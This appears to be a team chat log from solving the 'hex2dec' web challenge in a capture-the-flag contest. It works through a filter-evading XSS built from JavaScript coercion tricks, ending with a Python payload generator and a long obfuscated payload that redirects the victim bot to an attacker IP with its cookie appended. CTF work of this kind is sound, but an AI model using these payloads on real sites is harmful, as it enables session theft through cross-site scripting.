Project Sekai - ✅-web-hex2dec

hex2dec - 1000 points

Category: Web Description: Converting from hexadecimal to decimal is a pain. web: http://hex2dec-web.chal.crewc.tf:8084/ bot: http://hex2dec-bot.chal.crewc.tf:8085/ Author : Satoooon `` Files:

https://crewc.tf/files/ea481312500c74d7f7e2d3dab5b57318/hex2dec.zip?token=eyJ1c2VyX2lkIjoyMSwidGVhbV9pZCI6MTYsImZpbGVfaWQiOjU1fQ.ZKmWhQ.aA3DjEtQD28C1I1eXzjH11Yjk9g

Tags: No tags.

Sutx pinned a message to this channel. 07/08/2023 10:01 AM

@irogir wants to collaborate

apparently using compose is too much to ask for

@ElleuchX1 wants to collaborate

10:14

@Zafirr wants to collaborate

the regex is wrong?

10:15

we can use stuff like @, _, [, ]

10:16

<b>ABCD this works

10:16

idk how to get full xss though, stuff like = is banned

10:17

nvm = works, () doesnt

yes the second minus is not escaped

10:22

ok we have enough chars to build a js payload

nice, gl

10:23

im not experienced enough in this xd

10:29

csp

unsafe inline, this chall feels like a jsjail

truly (edited)

most annoying thing is parentheses blocked

lmao

10:36

the uppercase is also annoying

true, but can use hexchars, need somehow a primitive to call functions/ building strings without using eval

10:39

we have backticks and could use them to pass args, but cant use octal esc sequences

would <SCRIPT SRC=> work?

10:42

dont need the backticks

would bypass the blacklist, but violates the csp pol default-src 'none'

i see

so we would need to get something like: document.loc = exfil + cookies

would there be a way to traverse the dom from just [] maybe?

10:47

[]['xxx']['xxx'] and so on

10:51

doesnt seems so

yeah i was trying to inject a tag with an id whose identifier we then access via js to reach document or window

10:55

but unsuccessful so far

ok there is a.ownerDocument.location

docker updated for hex2dec ,the changes does not affect the solution but we request you to still redownload the files to reproduce locally

wtf.

irogir

ok there is a.ownerDocument.location

ok problem reduced to gen arb strings

nice

11:12

what about document.cookie though

irogir

ok there is a.ownerDocument.location

this returns the document

ok

11:14

ok so we have `

11:14

i think we can use binary ops to get required chars

rip we missed the first blood

yes i suck at js

11:24

NaN + [] we can get N with that

oh yea we can use +

and JSON + [] = [object JSON (str)

yeah tons of strings

11:25

just need to grind

11:25

for each letter

11:25

i think you got this, gn

11:27

also i think if you just get "toLower" it should be faster

11:27

just need t,o,w,r

11:27

then you could do like `OWNER`[`toLower`]`` (edited)

yep cyu

@jayden wants to collaborate

ok have location :

(([] == {})+[])[2]+({} + [][0])[1]+({} + [][0])[5]+(([] == {})+[])[1]+({} + [][0])[6]+({} + [][0])[20]+({} + [][0])[1]+({} + [][0])[16]

11:36

need to go now ~20m

ok playing box now, but if someone has time: one can get all chars with baseURI nodelement (edited)

how close is this msfrog

12:13

gl

@Legoclones wants to collaborate

alright gonna take a look at this now

13:11

looks like you've got a great start

13:11

lets see

okay im confused

13:22

I can't get any ( in there (edited)

irogir

ok have location :

(([] == {})+[])[2]+({} + [][0])[1]+({} + [][0])[5]+(([] == {})+[])[1]+({} + [][0])[6]+({} + [][0])[20]+({} + [][0])[1]+({} + [][0])[16]

how does that work?

13:23

like can u share link?

thats a temp payload, you can get (x) with [x][0] as string

13:24

i can join in a few minutes

okay yeah when u get on lmk cuz I'm still confused lol

13:31

and we have to wrap our payload in <IMG ONLOAD=>, right? because a <script> tag placed after page load won't be run

Legoclones

okay yeah when u get on lmk cuz I'm still confused lol

okay so what i meant is that instead of (([] == {})+[]) to gen false string, we can do [[[]==[]]+[]]

13:35

this gives us an arr with false str

also we can't use {} i dont thikn

Legoclones

and we have to wrap our payload in <IMG ONLOAD=>, right? because a <script> tag placed after page load won't be run

it shouldnt matter i think, preparing payload

Legoclones

also we can't use {} i dont thikn

yes its blocked

13:37

i enum the builtins we can use, CSS, JSON and NaN

wait []==[] is false

javascript lol

irogir

Click to see attachment 🖼️

so goal is to inject an element with an id we can access from js globals

13:38

13:38

then call a[ownerDocument] to get document reference

13:39

1s i had smth earlier

13:40

this is the url for redirect to static url

message.txt

3.67 KB

13:40

just need to find cookie

13:41

the script i used for generating stuff

rmap = {}

# uppercase
r = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdef:?"

for i, c in enumerate(r):
    if c not in rmap:
        rmap[c] = f"`{c}`"


r = "=;"
for i, c in enumerate(r):
    if c not in rmap:
        rmap[c] = c


r = "false"

for i, c in enumerate(r):
    if c not in rmap:
        rmap[c] = "[[[]==[]]+[]][0][%d]" % (i)


r = "[object JSON]undefined"

for i, c in enumerate(r):
    if c not in rmap:
        rmap[c] = "[JSON+[][1]][0][%d]" % (i)

r = "http://hex2dec-web.chal.crewc.tf:8084/"

for i, c in enumerate(r):
    if c not in rmap:
        rmap[c] = "a[`b`+`a`+[[[]==[]]+[]][0][3]+`e`+`U`+`R`+`I`][%d]" % (i)


target = "d=a[parentNode][parentNode][parentNode][parentNode];;;; d[location] = http:/ip:9000?a="  # d[cookie]

target = "http://ip:9000?a="

target = "baseURI"

target = "parentNode"

target = "location"

target = "http://lol.de"

s = ""
for i in target:
    if i not in rmap:
        raise Exception("not in rmap: ", i)
    else:
        s += rmap[i] + "+"

print(s)

ok i think we can abuse that the tag gets lower cased when using outerHTML(?)

im getting an empty cookie, weird

14:13

httponly flag set

14:13

i mean not set

@Legoclones can you test whether this works in your console

14:25

a[`b`+`a`+[[[]==[]]+[]][0][3]+`e`+`U`+`R`+`I`][0]+[JSON+[][1]][0][6]+[JSON+[][1]][0][6]+a[`b`+`a`+[[[]==[]]+[]][0][3]+`e`+`U`+`R`+`I`][3]+`:`+a[`b`+`a`+[[[]==[]]+[]][0][3]+`e`+`U`+`R`+`I`][5]+a[`b`+`a`+[[[]==[]]+[]][0][3]+`e`+`U`+`R`+`I`][5]+`8`+`7`+a[`b`+`a`+[[[]==[]]+[]][0][3]+`e`+`U`+`R`+`I`][18]+`1`+`5`+`5`+a[`b`+`a`+[[[]==[]]+[]][0][3]+`e`+`U`+`R`+`I`][18]+`1`+`6`+`8`+a[`b`+`a`+[[[]==[]]+[]][0][3]+`e`+`U`+`R`+`I`][18]+`2`+`4`+`6`+`:`+`9`+`0`+`0`+`1`+a[`b`+`a`+[[[]==[]]+[]][0][3]+`e`+`U`+`R`+`I`][5]+`:`+`a` + `b` + a[a[`b`+`a`+[[[]==[]]+[]][0][3]+`e`+`U`+`R`+`I`][3]+`a`+a[`b`+`a`+[[[]==[]]+[]][0][3]+`e`+`U`+`R`+`I`][25]+`e`+[JSON+[][1]][0][14]+[JSON+[][1]][0][6]+`N`+[JSON+[][1]][0][1]+`d`+`e`][a[`b`+`a`+[[[]==[]]+[]][0][3]+`e`+`U`+`R`+`I`][3]+`a`+a[`b`+`a`+[[[]==[]]+[]][0][3]+`e`+`U`+`R`+`I`][25]+`e`+[JSON+[][1]][0][14]+[JSON+[][1]][0][6]+`N`+[JSON+[][1]][0][1]+`d`+`e`][a[`b`+`a`+[[[]==[]]+[]][0][3]+`e`+`U`+`R`+`I`][3]+`a`+a[`b`+`a`+[[[]==[]]+[]][0][3]+`e`+`U`+`R`+`I`][25]+`e`+[JSON+[][1]][0][14]+[JSON+[][1]][0][6]+`N`+[JSON+[][1]][0][1]+`d`+`e`][a[`b`+`a`+[[[]==[]]+[]][0][3]+`e`+`U`+`R`+`I`][3]+`a`+a[`b`+`a`+[[[]==[]]+[]][0][3]+`e`+`U`+`R`+`I`][25]+`e`+[JSON+[][1]][0][14]+[JSON+[][1]][0][6]+`N`+[JSON+[][1]][0][1]+`d`+`e`][a[`b`+`a`+[[[]==[]]+[]][0][3]+`e`+`U`+`R`+`I`][3]+`a`+a[`b`+`a`+[[[]==[]]+[]][0][3]+`e`+`U`+`R`+`I`][25]+`e`+[JSON+[][1]][0][14]+[JSON+[][1]][0][6]+`N`+[JSON+[][1]][0][1]+`d`+`e`][`c`+[JSON+[][1]][0][1]+[JSON+[][1]][0][1]+e[[JSON+[][1]][0][1]+[JSON+[][1]][0][13]+[JSON+[][1]][0][6]+`e`+a[`b`+`a`+[[[]==[]]+[]][0][3]+`e`+`U`+`R`+`I`][25]+`H`+`T`+`M`+`L`][1]+[JSON+[][1]][0][18]+`e`]

14:25

set document.cookie before

bruh

14:38

enc issues

irogir

used /ctf solve

✅ Challenge solved.

strong

crew{dom_clobbering_is_helpful_for_a_restricted_xss} where dom clubbering

niceeeeee

14:59

idk, maybe u unintended??

prob intended i think?

maybe they meant that one had to use dom to get access to document, but thats not dom clubbering lol

Irogir too strong

00:11

Come unintend the other web aswell

‍